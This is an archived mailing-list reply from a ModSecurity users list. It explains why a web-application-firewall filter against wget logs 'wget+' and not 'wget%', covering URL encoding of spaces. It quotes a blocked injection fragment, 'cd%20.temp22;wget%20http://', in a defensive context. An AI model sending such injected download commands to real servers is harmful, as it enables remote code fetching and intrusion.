Re: [mod-security-users] Wget filter
Brought to you by:
victorhora,
zimmerletw
Menu
▾
▴
Re: [mod-security-users] Wget filter
|
From: Oliver S. <Bor...@gm...> - 2005-01-27 23:43:24
|
Privet, > 1) My logs always contain "wget+" but no "wget%" even if the following > request was blocked "cd%20.temp22;wget%20http://". > Why so? Why my log does not contain "wget%" at all? %20 is the escaped version of a blank space. (0x20 is the hexadecimal representation of the character code 32 which is a blank space). wget+ represents exactly the same, because blank space has two different representations in this encoding scheme: + and %20. Seems that Apache internally decodes %20 but not + which is natural since + may be a valid filename character. Hence you would find "wget " but not "wget%". By the way: this will only filter WGET calls (executing WGET), WGET itself allows to mimic any browser and cannot be blocked as a client. Oliver -- --------------------------------------------------- May the source be with you, stranger ;) ICQ: #281645 URL: http://assarbad.net |
